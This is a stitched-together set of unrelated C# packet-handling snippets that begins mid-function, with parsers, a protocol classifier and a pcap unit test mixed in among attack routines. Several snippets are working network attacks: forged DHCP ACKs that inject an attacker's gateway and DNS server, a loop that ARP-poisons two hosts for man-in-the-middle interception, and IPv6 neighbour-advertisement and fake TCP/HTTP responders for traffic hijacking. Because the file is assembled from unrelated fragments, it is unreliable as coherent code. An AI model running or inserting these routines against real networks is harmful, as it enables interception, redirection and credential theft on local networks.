IpInforArray.Add("Identification: 0x" + Convert.ToString((Int32)ip4.Id, 16).ToUpper().PadLeft(4, '0') + "(" + ip4.Id.ToString() + ")\n"); IpInforArray.Add("Flags: 0x" + Convert.ToString(ip4.Bytes[6] / 32, 16).ToUpper().PadLeft(2, '0') + "\n"); // IpInforArray.Add("Fragment Offset: " + (Convert.ToInt32((ip4.Bytes[6] % 32) << 8) + Convert.ToInt32(ip4.Bytes[7])).ToString() + "\n"); IpInforArray.Add("TTL: " + ip4.TimeToLive.ToString() + "\n"); IpInforArray.Add("Protocol: " + ip4.Protocol.ToString() + " \n"); IpInforArray.Add("CheckSum: " + ip4.Checksum.ToString() + "\n"); IpInforArray.Add("Source IP Address: " + ip4.SourceAddress.ToString() + "\n"); IpInforArray.Add("Destination IP Address: " + ip4.DestinationAddress.ToString() + "\n"); IpInforArray.Add("Option: if any.\n"); KeyWords.Add(ip4.Protocol.ToString().ToUpper()); KeyWords.Add(ip4.Id.ToString().ToUpper()); KeyWords.Add(ip4.SourceAddress.ToString().ToUpper()); KeyWords.Add(ip4.DestinationAddress.ToString().ToUpper()); TRANS_type = ip4.Protocol.ToString().ToUpper(); if (ip4.Protocol.ToString() == "ICMP") { icmpProtocol(); } else if (ip4.Protocol.ToString() == "UDP") { udpProtocol(); } else if (ip4.Protocol.ToString() == "TCP") { tcpProtocol(); } else if (ip4.Protocol.ToString() == "IGMP") { igmpProtocol(); } else { ; } } else if (epac.Type.ToString() == "IpV6") { ip6 = (IPv6Packet)epac.Extract(typeof(IPv6Packet)); this.protocol = ip6.Protocol.ToString(); this.destination = ip6.DestinationAddress.ToString(); this.source = ip6.SourceAddress.ToString(); this.information = ip6.TotalLength.ToString() + "Bytes "; IpInforArray.Add("Version: " + ip6.Version.ToString() + "\n"); IpInforArray.Add("Traffic Class : 0x" + Convert.ToString(ip6.Bytes[0] % 16, 16).PadLeft(1, '0') + Convert.ToString((Int32)(ip6.Bytes[1] / 16), 16).PadLeft(1, '0') + "\n"); IpInforArray.Add("Flow Label: 0x" + Convert.ToString(ip6.Bytes[1] % 16, 16).PadLeft(1, '0') + Convert.ToString(ip6.Bytes[2], 16).PadLeft(2, '0') + Convert.ToString(ip6.Bytes[3], 16).PadLeft(2, '0') + "\n"); IpInforArray.Add("Payload Length: " + ip6.PayloadLength.ToString() + "\n"); IpInforArray.Add("Next Header: " + ip6.NextHeader.ToString() + "\n"); IpInforArray.Add("Hop Limit: " + ip6.HopLimit.ToString() + "\n"); IpInforArray.Add("Source Address: " + ip6.SourceAddress.ToString() + "\n"); IpInforArray.Add("Destination Address: " + ip6.DestinationAddress.ToString() + "\n"); KeyWords.Add(ip6.Protocol.ToString().ToUpper()); KeyWords.Add(ip6.SourceAddress.ToString().ToUpper()); KeyWords.Add(ip6.DestinationAddress.ToString().ToUpper()); TRANS_type = ip6.Protocol.ToString().ToUpper(); // if(ip6.PayloadData != null && ip6.PayloadData[0] == 58) // MessageBox.Show("ICMPv6"); if (ip6.Protocol.ToString() == "ICMPV6") { icmpProtocol(); } else if (ip6.Protocol.ToString() == "UDP") { udpProtocol(); } else if (ip6.Protocol.ToString() == "TCP") { tcpProtocol(); } else if (ip6.Protocol.ToString() == "IGMP") { igmpProtocol(); } else if (ip6.PayloadData != null && ip6.PayloadData[0] == 58) { icmpProtocol();; } KeyWords.Add(this.color.ToString().ToUpper()); KeyWords.Add(this.protocol.ToString().ToUpper()); } } else if (epac.Type.ToString() == "Arp") //分析arp报文 { var arppacket = (ARPPacket)epac.Extract(typeof(ARPPacket)); ArpInforArray.Add("HardwareAddressType: " + arppacket.HardwareAddressType.ToString() + "\n"); ArpInforArray.Add("ProtocolAddressType: " + arppacket.ProtocolAddressType.ToString() + "\n"); ArpInforArray.Add("HardwareAddressLength: " + arppacket.HardwareAddressLength.ToString()); ArpInforArray.Add("ProtocolAddressLength: " + arppacket.ProtocolAddressLength.ToString()); ArpInforArray.Add("Operation: " + arppacket.Operation.ToString()); ArpInforArray.Add("SenderHardwareAddress: " + genHardwareAddr(arppacket.SenderHardwareAddress.ToString())); ArpInforArray.Add("SenderProtocolAddress: " + arppacket.SenderProtocolAddress.ToString()); ArpInforArray.Add("TargetHardwareAddress: " + genHardwareAddr(arppacket.TargetHardwareAddress.ToString())); ArpInforArray.Add("TargetProtocolAddress: " + arppacket.TargetProtocolAddress.ToString()); this.color = "Salmon"; this.protocol = "ARP"; this.source = arppacket.SenderProtocolAddress.ToString(); this.destination = arppacket.TargetProtocolAddress.ToString(); this.information = arppacket.SenderProtocolAddress.ToString() + " want to get in touch with " + arppacket.TargetProtocolAddress.ToString(); KeyWords.Add(genHardwareAddr(arppacket.SenderHardwareAddress.ToString().ToUpper())); KeyWords.Add(arppacket.SenderProtocolAddress.ToString().ToUpper()); KeyWords.Add(genHardwareAddr(arppacket.TargetHardwareAddress.ToString().ToUpper())); KeyWords.Add(arppacket.TargetProtocolAddress.ToString().ToUpper()); KeyWords.Add(this.color); } } }
unsafe public void AnalyzePacket(WinPcapDevice device, Packet p) { if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket)) return; UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket; if (udp.ParentPacket == null) return; if (!(udp.ParentPacket is IPv4Packet)) return; IPv4Packet packetIpLayer = (IPv4Packet)udp.ParentPacket; if (udp.PayloadData.Length < sizeof(DHCP.bootp)) return; DHCP.bootp* dhcp = (DHCP.bootp*)Marshal.UnsafeAddrOfPinnedArrayElement(udp.PayloadData, 0).ToPointer(); DHCP.RequestedIP optionRequestedIP = new DHCP.RequestedIP(); bool existsOptionRequestedIP = false; DHCP.ServerID optionServerID = new DHCP.ServerID(); bool existsOptionServerID = false; string Strname = string.Empty; ushort bp_vend_len = (ushort)(udp.Length - Marshal.SizeOf(*dhcp) + 4); uint pos = 4; while (pos < bp_vend_len) { byte option = dhcp->bp_vend[pos]; if (option == 0xff) { break; } byte len = dhcp->bp_vend[pos + 1]; switch (option) { case DHCP.TAG_DHCP_MESSAGE: { DHCP.MessageType* mtype = (DHCP.MessageType*)(dhcp->bp_vend + pos); //We save the real DHCP IP if (mtype->type == DHCP.DHCPACK && packetIpLayer.SourceAddress.Address != 0) DHCPIP = packetIpLayer.SourceAddress; //We get the DHCP Server MAC if (mtype->type == DHCP.DHCPOFFER) DHCPMAC = (p as EthernetPacket).SourceHwAddress; //We only continue if it's a DHCP Request if (mtype->type != DHCP.DHCPREQUEST) return; break; } case DHCP.TAG_REQUESTED_IP: { optionRequestedIP.id = ((DHCP.RequestedIP*)(dhcp->bp_vend + pos))->id; existsOptionRequestedIP = true; break; } case DHCP.TAG_SERVER_ID: { optionServerID.id = ((DHCP.ServerID*)(dhcp->bp_vend + pos))->id; DHCPIP = new IPAddress(optionServerID.id); existsOptionServerID = true; break; } case DHCP.TAG_HOSTNAME: { byte* chr = (((DHCP.Hostname*)(dhcp->bp_vend + pos))->name); byte lenght = ((DHCP.Hostname*)(dhcp->bp_vend + pos))->optionHeader.lenght; for (int i = 0; i < lenght; i++) Strname += (char)chr[i]; break; } } pos += (uint)len + 2; //The option and the length field } bool realizarataque = false; string dns = string.Empty; string gateway = string.Empty; string MAC; foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DHCPACKInjection && A.attackStatus == Data.AttackStatus.Attacking)) { dns = (attack as DHCPACKInjectionAttack).dns; gateway = (attack as DHCPACKInjectionAttack).gateway; MAC = (attack as DHCPACKInjectionAttack).MAC; //If filter does not apply not continue if (!string.IsNullOrEmpty(MAC) && !(p.PayloadPacket as EthernetPacket).SourceHwAddress.Equals(PhysicalAddress.Parse(MAC))) realizarataque = false; else { realizarataque = true; break; } } if (!realizarataque) return; //Configuration used in the attack PhysicalAddress MACUsed; if (Program.CurrentProject.data.settings.UseRealDHCPData) { if (DHCPMAC != null) MACUsed = DHCPMAC; else //If the real dhcp server mac is not found we use the computer network device mac MACUsed = device.Interface.MacAddress; } else { MACUsed = PhysicalAddress.Parse(Program.CurrentProject.data.settings.DHCPFakeServerMAC); } IPAddress IPUsed; if (Program.CurrentProject.data.settings.UseRealDHCPData) { if (existsOptionServerID) IPUsed = new IPAddress(optionServerID.id); else { if (DHCPIP.Address == 0) { Program.LogThis("DHCP IP Address unknown, using 0.0.0.0 as IP source", Logs.Log.LogType.DHCPACKInjection); IPUsed = IPAddress.Parse("0.0.0.0"); } else { IPUsed = DHCPIP; } } } else { IPUsed = IPAddress.Parse(Program.CurrentProject.data.settings.DHCPFakeServerIP); } //Now we create a fake response EthernetPacket response = new EthernetPacket(MACUsed, new PhysicalAddress(new byte[] { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }), EthernetPacketType.IpV4); response.PayloadPacket = new IPv4Packet(IPUsed, new System.Net.IPAddress(0xffffffff)); //We want to follow the IP communication (response.PayloadPacket as IPv4Packet).Id = packetIpLayer.Id; response.PayloadPacket.PayloadPacket = new UdpPacket(67, 68); response.PayloadPacket.PayloadPacket.PayloadData = new byte[16]; response.PayloadPacket.PayloadPacket.PayloadData = new byte[sizeof(DHCP.bootp) + sizeof(DHCP.optionsResponse)]; dhcp->bp_op = DHCP.BOOTPREPLY; if (existsOptionRequestedIP) dhcp->bp_yiaddr = optionRequestedIP.id; else if (dhcp->bp_ciaddr != 0) dhcp->bp_yiaddr = dhcp->bp_ciaddr; else { return; } dhcp->bp_flags = 0; Marshal.Copy(new IntPtr(dhcp), response.PayloadPacket.PayloadPacket.PayloadData, 0, sizeof(DHCP.bootp)); //We need to fill the optionResponseStatic fields if (existsOptionServerID) optionResponseStatic.serverID.id = optionServerID.id; optionResponseStatic.serverID.id = (uint)IPUsed.Address; optionResponseStatic.route.ip = (uint)IPAddress.Parse(gateway).Address; optionResponseStatic.domainNameServer.ip = (uint)IPAddress.Parse(dns).Address; fixed (DHCP.optionsResponse* op = &optionResponseStatic) { Marshal.Copy(new IntPtr(op), response.PayloadPacket.PayloadPacket.PayloadData, sizeof(DHCP.bootp), sizeof(DHCP.optionsResponse)); } response.UpdateCalculatedValues(); (response.PayloadPacket as IPv4Packet).UpdateCalculatedValues(); (response.PayloadPacket as IPv4Packet).UpdateIPChecksum(); (response.PayloadPacket.PayloadPacket as UdpPacket).UpdateCalculatedValues(); (response.PayloadPacket.PayloadPacket as UdpPacket).UpdateUDPChecksum(); device.SendPacket(response); string message = string.Format("DHCP ACK sent to a {0} DHCP Request", new IPAddress(dhcp->bp_yiaddr).ToString()); Program.LogThis(message, Logs.Log.LogType.DHCPACKInjection); }
private string findProtocol(PacketDotNet.EthernetPacket packet) { if (packet != null) { //Console.WriteLine("-------------------------------"); //System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString()); //Console.WriteLine("-------------------------------"); if (packet.Type.ToString().Equals("IpV4")) { //System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString()); // Console.WriteLine("Som v IPv4"); var IpPacket = (PacketDotNet.IpPacket)packet.Extract(typeof(PacketDotNet.IpPacket)); //System.Diagnostics.Trace.WriteLine("{0}", IpPacket.Protocol.ToString()); if (IpPacket.Protocol.ToString().Equals("TCP")) { // System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString()); // Console.WriteLine("Som v TCP"); var TcpPacket = (PacketDotNet.TcpPacket)IpPacket.Extract(typeof(PacketDotNet.TcpPacket)); if (TcpPacket.SourcePort == 80) { return("HTTPS"); } else if (TcpPacket.DestinationPort == 80) { return("HTTPD"); } return("TCP"); } else if (IpPacket.Protocol.ToString().Equals("UDP")) { // Console.WriteLine("Som v UDP"); return("UDP"); } else if (IpPacket.Protocol.ToString().Equals("ICMP")) { var icmpPacket = (PacketDotNet.ICMPv4Packet)IpPacket.Extract(typeof(PacketDotNet.ICMPv4Packet)); if (icmpPacket.TypeCode.ToString().Equals("EchoReply")) { return("ICMPRep"); } else if (icmpPacket.TypeCode.ToString().Equals("EchoRequest")) { return("ICMPReq"); } } } else if (packet.Type.ToString().Equals("Arp")) { //System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString()); // Console.WriteLine("Som v ARP"); return("ARP"); } else { // System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString()); return(null); } } return(null); }
// create ARP request packet (destination IP, deviceInfo) private EthernetPacket GenerateARPRequest(IPAddress destinationIP, IPAddress senderIP) { var ethernetPacket = new EthernetPacket(physicalAddress, broadcastMAC, EthernetPacketType.Arp); var arpPacket = new ARPPacket(ARPOperation.Request, broadcastMAC, destinationIP, physicalAddress, senderIP); ethernetPacket.PayloadPacket = arpPacket; return ethernetPacket; }
static public void SendNeighborAdvertisement(IPAddress ipSrc, PhysicalAddress MACSrc, IPAddress ipDest, PhysicalAddress MACDest) { Packet p = new EthernetPacket(MACSrc, MACDest, EthernetPacketType.IpV6); p.PayloadPacket = new IPv6Packet(ipSrc, ipDest); (p.PayloadPacket as IPv6Packet).HopLimit = 255; NeighborAdvertisement NA = new NeighborAdvertisement(ipSrc, MACSrc); ICMPv6Packet icmp = new ICMPv6Packet(new ByteArraySegment(NA.GetBytes())); icmp.Type = (ICMPv6Types)136; //Neighbor Advertisement icmp.Code = 0; p.PayloadPacket.PayloadPacket = icmp; Program.CurrentProject.data.SendPacket(p); }
public void ParsingPacket() { var dev = new CaptureFileReaderDevice("../../CaptureFiles/test_stream.pcap"); dev.Open(); RawCapture p; p = dev.GetNextPacket(); var e = new EthernetPacket(new ByteArraySegment(p.Data)); Console.WriteLine("ethernet.ToString() {0}", e.ToString()); Assert.AreEqual(PhysicalAddress.Parse("00-13-10-03-71-47"), e.SourceHwAddress); Assert.AreEqual(PhysicalAddress.Parse("00-E0-4C-E5-73-AD"), e.DestinationHwAddress); Assert.AreEqual(EthernetPacketType.IpV4, e.Type); dev.Close(); }
private void Ipv6ToIpv4(EthernetPacket orgPacket) { try { IPv6Packet ipv6 = (IPv6Packet)orgPacket.PayloadPacket; if (ipv6.PayloadPacket is PacketDotNet.ICMPv6Packet) { ICMPv6Packet icmp = ipv6.PayloadPacket as ICMPv6Packet; icmp.Type = ICMPv6Types.EchoReply; icmp.UpdateCalculatedValues(); icmp.Checksum = (ushort)ChecksumUtils.OnesComplementSum(icmp.Bytes); IPv6Packet ipv6Ack = new IPv6Packet(ipv6.DestinationAddress, ipv6.SourceAddress); ipv6Ack.PayloadPacket = icmp; EthernetPacket eth = new EthernetPacket(orgPacket.DestinationHwAddress, orgPacket.SourceHwAddress, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; Program.CurrentProject.data.SendPacket(eth); } else if (ipv6.PayloadPacket is PacketDotNet.TcpPacket) { TcpPacket tcp = ipv6.PayloadPacket as TcpPacket; ushort destPort = tcp.SourcePort; ushort sourcePort = tcp.DestinationPort; IPAddress destAddress = ipv6.SourceAddress; IPAddress sourceAddress = ipv6.DestinationAddress; PhysicalAddress sourceMac = device.MacAddress; PhysicalAddress destMac = orgPacket.SourceHwAddress; tcp.SourcePort = sourcePort; tcp.DestinationPort = destPort; if (tcp.Syn && !tcp.Ack && !tcp.Rst && tcp.PayloadData.Length == 0) { if (sourcePort == 80) { tcp.Ack = true; tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1; tcp.SequenceNumber = tcp.SequenceNumber + 38; tcp.WindowSize = 14600; IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress); ipv6Ack.PayloadPacket = tcp; EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } else if (sourcePort == 443) { tcp.Syn = false; tcp.Ack = true; tcp.Rst = true; tcp.Psh = false; uint ackOrg = tcp.AcknowledgmentNumber; tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1; tcp.SequenceNumber = 0; tcp.WindowSize = 0; tcp.PayloadData = new byte[0]; IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress); ipv6Ack.PayloadPacket = tcp; EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } } else if (!tcp.Syn && tcp.Ack && tcp.PayloadData != null && !tcp.Rst && tcp.PayloadData.Length > 0 && sourcePort == 80) { string element = string.Format("{0}/{1}", tcp.SequenceNumber, tcp.AcknowledgmentNumber); if (!Data.Data.SlaacReqList.Contains(element)) { Data.Data.SlaacReqList.Add(element); HttpPacket httpReq = new HttpPacket(tcp.PayloadData); if (httpReq.IsCompleted) { SendHttpResponse(httpReq, orgPacket, tcp.SourcePort, tcp.DestinationPort, tcp.AcknowledgmentNumber, tcp.SequenceNumber + (uint)tcp.PayloadData.Length); } else { lock (htppLock) { //incomplete packet TcpReconstructorPacket previousPacket = (from p in Program.CurrentProject.data.ReconstructedPackets where p.ExpectedSequenceNumber == tcp.SequenceNumber select p).FirstOrDefault(); TcpReconstructorPacket nextPacket = (from p in Program.CurrentProject.data.ReconstructedPackets where p.FirstSequenceNumber == tcp.SequenceNumber + tcp.PayloadData.Length select p).FirstOrDefault(); if (nextPacket != null || previousPacket != null) { bool packetSend = false; if (nextPacket != null) { nextPacket.InsertPreviousTcpPacket(tcp); httpReq = new HttpPacket(nextPacket.Data); if (httpReq.IsCompleted) { packetSend = true; Program.CurrentProject.data.ReconstructedPackets.Remove(nextPacket); SendHttpResponse(httpReq, orgPacket, tcp.SourcePort, tcp.DestinationPort, tcp.AcknowledgmentNumber, nextPacket.ExpectedSequenceNumber); } } if (previousPacket != null && !packetSend) { if (nextPacket != null) { previousPacket.AppendTcpPacket(nextPacket); Program.CurrentProject.data.ReconstructedPackets.Remove(nextPacket); } else previousPacket.AppendTcpPacket(tcp); httpReq = new HttpPacket(previousPacket.Data); if (httpReq.IsCompleted) { Program.CurrentProject.data.ReconstructedPackets.Remove(previousPacket); SendHttpResponse(httpReq, orgPacket, tcp.SourcePort, tcp.DestinationPort, tcp.AcknowledgmentNumber, previousPacket.ExpectedSequenceNumber); } } } else { Program.CurrentProject.data.ReconstructedPackets.Add(new TcpReconstructorPacket(tcp)); } var toDelete = Program.CurrentProject.data.ReconstructedPackets.Where(p => DateTime.Now.Subtract(p.CreationTime).TotalMinutes > 2); foreach (var item in toDelete) { Program.CurrentProject.data.ReconstructedPackets.Remove(item); } } } } } else if (tcp.Fin && tcp.Ack && !tcp.Rst && tcp.PayloadData.Length == 0) { tcp.Ack = true; tcp.Fin = false; uint ackOrg = tcp.AcknowledgmentNumber; tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1; tcp.SequenceNumber = ackOrg; tcp.WindowSize = 1400; IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress); ipv6Ack.PayloadPacket = tcp; EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6); eth.PayloadPacket = ipv6Ack; (eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum(); Program.CurrentProject.data.SendPacket(eth); } } } catch { } }
private void Attack() { while (true) { try { PhysicalAddress MACLocal = device.MacAddress; EthernetPacket ethernet; foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.ARPSpoofing && A.attackStatus == Data.AttackStatus.Attacking)) { if (attack is MitmAttack) { ethernet = GenerateResponseArpPoison(device.Interface.MacAddress, ((MitmAttack)attack).t1.mac, ((MitmAttack)attack).t1.ip, ((MitmAttack)attack).t2.ip); Program.CurrentProject.data.SendPacket(ethernet); ethernet = GenerateResponseArpPoison(device.Interface.MacAddress, ((MitmAttack)attack).t2.mac, ((MitmAttack)attack).t2.ip, ((MitmAttack)attack).t1.ip); Program.CurrentProject.data.SendPacket(ethernet); } } foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.ARPSpoofing && A.attackStatus == Data.AttackStatus.Stopping)) { if (attack is MitmAttack) { ethernet = new EthernetPacket(device.Interface.MacAddress, ((MitmAttack)attack).t1.mac, EthernetPacketType.Arp); ethernet.PayloadPacket = new ARPPacket(ARPOperation.Response, ((MitmAttack)attack).t1.mac, ((MitmAttack)attack).t1.ip, ((MitmAttack)attack).t2.mac, ((MitmAttack)attack).t2.ip); Program.CurrentProject.data.SendPacket(ethernet); ethernet = new EthernetPacket(device.Interface.MacAddress, ((MitmAttack)attack).t2.mac, EthernetPacketType.Arp); ethernet.PayloadPacket = new ARPPacket(ARPOperation.Response, ((MitmAttack)attack).t2.mac, ((MitmAttack)attack).t2.ip, ((MitmAttack)attack).t1.mac, ((MitmAttack)attack).t1.ip); Program.CurrentProject.data.SendPacket(ethernet); attack.attackStatus = Data.AttackStatus.Stop; } } Thread.Sleep(SendPacketEachXSecs * 1000); } catch (ThreadAbortException) { return; } catch { } } }
public LinuxSLLPacket(byte[] Bytes, int Offset, PosixTimeval Timeval) : base(Timeval) { base.header = new ByteArraySegment(Bytes, Offset, LinuxSLLFields.SLLHeaderLength); base.payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(base.header, this.EthernetProtocolType, Timeval); }